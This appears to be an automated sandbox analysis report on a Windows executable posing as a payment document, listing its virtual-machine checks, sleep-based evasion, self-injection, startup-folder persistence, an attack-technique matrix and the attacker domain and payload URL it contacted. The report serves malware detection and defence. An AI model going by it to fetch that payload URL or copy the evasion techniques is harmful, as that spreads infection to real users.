              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: Process Memory Space: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe PID: 7724, type: MEMORYSTR
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1626618213.0000000002904000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeMemory allocated: 27E0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeMemory allocated: 2870000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeMemory allocated: 4870000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeMemory allocated: D50000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeMemory allocated: 2810000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeMemory allocated: 2640000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeWindow / User API: threadDelayed 1657Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeWindow / User API: threadDelayed 5773Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -21213755684765971s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -100000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7780Thread sleep count: 1657 > 30Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -99869s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7780Thread sleep count: 5773 > 30Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -99765s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -99656s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -99534s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -99406s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -99297s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -99187s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -99078s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -98968s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -98855s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -98734s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -98624s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -98513s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -98306s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -98168s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -97991s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -97875s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -97762s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -97656s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -97547s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -97437s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -97328s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -97219s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -97109s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -97000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -96890s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -96781s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -96672s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -96562s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -96453s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -96343s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -96234s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -96125s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -96015s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe TID: 7756Thread sleep time: -95906s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 100000Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 99869Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 99765Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 99656Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 99534Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 99406Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 99297Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 99187Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 99078Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 98968Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 98855Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 98734Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 98624Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 98513Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 98306Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 98168Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 97991Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 97875Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 97762Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 97656Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 97547Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 97437Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 97328Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 97219Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 97109Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 97000Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 96890Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 96781Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 96672Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 96562Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 96453Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 96343Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 96234Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 96125Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 96015Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeThread delayed: delay time: 95906Jump to behavior
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1626014604.0000000000C13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllXs<
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1626618213.0000000002904000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
              Source: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1626618213.0000000002904000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeMemory written: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe base: 550000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeProcess created: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe "C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe"Jump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeQueries volume information: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeQueries volume information: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting
              Valid Accounts1
              Scheduled Task/Job
              1
              Scripting
              111
              Process Injection
              1
              Masquerading
              OS Credential Dumping211
              Security Software Discovery
              Remote Services1
              Archive Collected Data
              1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              Scheduled Task/Job
              1
              Scheduled Task/Job
              1
              Disable or Modify Tools
              LSASS Memory1
              Process Discovery
              Remote Desktop ProtocolData from Removable Media1
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt2
              Registry Run Keys / Startup Folder
              2
              Registry Run Keys / Startup Folder
              41
              Virtualization/Sandbox Evasion
              Security Account Manager41
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCron1
              DLL Side-Loading
              1
              DLL Side-Loading
              111
              Process Injection
              NTDS1
              Application Window Discovery
              Distributed Component Object ModelInput Capture2
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Obfuscated Files or Information
              LSA Secrets12
              System Information Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Software Packing
              Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe18%ReversingLabs
              MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe100%AviraHEUR/AGEN.1323343
              MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\scriptcase-php8.exe100%AviraHEUR/AGEN.1323343
              C:\Users\user\AppData\Local\scriptcase-php8.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\scriptcase-php8.exe18%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://xianggrhen.com0%Avira URL Cloudsafe
              http://xianggrhen.com/camp/Reibbfkkyy.dat0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              xianggrhen.com
              45.9.191.182
              truefalse
                unknown
                s-part-0035.t-0009.t-msedge.net
                13.107.246.63
                truefalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  http://xianggrhen.com/camp/Reibbfkkyy.datfalse
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://github.com/mgravell/protobuf-netMN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://xianggrhen.comMN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1626618213.0000000002871000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://github.com/mgravell/protobuf-netiMN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://stackoverflow.com/q/14436606/23354MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1626618213.0000000002904000.00000004.00000800.00020000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://github.com/mgravell/protobuf-netJMN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1626618213.0000000002871000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://stackoverflow.com/q/11564914/23354;MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://stackoverflow.com/q/2152978/23354MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1644528067.00000000064E0000.00000004.08000000.00040000.00000000.sdmp, MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, 00000000.00000002.1638484562.0000000003C3E000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                45.9.191.182
                                xianggrhen.comGermany
                                47583AS-HOSTINGERLTfalse
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1569870
                                Start date and time:2024-12-06 11:04:32 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 6m 1s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:10
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
                                Detection:MAL
                                Classification:mal100.expl.evad.winEXE@4/3@1/1
                                EGA Information:
                                • Successful, ratio: 50%
                                HCA Information:
                                • Successful, ratio: 89%
                                • Number of executed functions: 75
                                • Number of non-executed functions: 8
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe, PID 8140 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                • VT rate limit hit for: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe
                                TimeTypeDescription
                                05:05:28API Interceptor36x Sleep call for process: MN-PAYMENT20241206-5002-10259-410291-30198-281920-30183-21474.exe modified
                                11:06:02AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\scriptcase-php8.vbs
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                45.9.191.182DecPayment410_F2103_S29103_M839_U4721_S381I_S98EEU_USD031224.exeGet hashmaliciousUnknownBrowse
                                • xianggrhen.com/desk/Tbddfcris.vdf
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                xianggrhen.comDecPayment410_F2103_S29103_M839_U4721_S381I_S98EEU_USD031224.exeGet hashmaliciousUnknownBrowse
                                • 45.9.191.182
                                AMTR-TT4781-SWFT-U4Y81-SO39-C37AR-AO937-CNR742-S3782-2818DY-9A82.exeGet hashmaliciousUnknownBrowse
                                • 92.113.29.113
                                s-part-0035.t-0009.t-msedge.net5Xt3byH0Pj.exeGet hashmaliciousXenoRATBrowse
                                • 13.107.246.63
                                1733477410159edf9b85a179e6cba033f8cb2d5a86e8ca4544f9e9f23b783f46e15a7ae1a2802.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                • 13.107.246.63
                                file.exeGet hashmaliciousLummaC StealerBrowse
                                • 13.107.246.63
                                2E7y4M3fki.exeGet hashmaliciousUnknownBrowse
                                • 13.107.246.63
                                Rubik_v3.3.1.xlsmGet hashmaliciousHTMLPhisherBrowse
                                • 13.107.246.63
                                mB7FXeHdAz.exeGet hashmaliciousUnknownBrowse
                                • 13.107.246.63
                                YEV8DgcIvI.exeGet hashmaliciousPetyaBrowse
                                • 13.107.246.63
                                8DThWiH5B7.exeGet hashmaliciousDCRatBrowse
                                • 13.107.246.63
                                xN0kb0SVOQ.exeGet hashmaliciousUnknownBrowse
                                • 13.107.246.63
                                QUOTATON-37839993.exeGet hashmaliciousFormBookBrowse
                                • 13.107.246.63
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                AS-HOSTINGERLTDecPayment410_F2103_S29103_M839_U4721_S381I_S98EEU_USD031224.exeGet hashmaliciousUnknownBrowse
                                • 45.9.191.182
                                https://application-workspace.com/red-bull/id-38772Get hashmaliciousUnknownBrowse
                                • 45.84.207.234
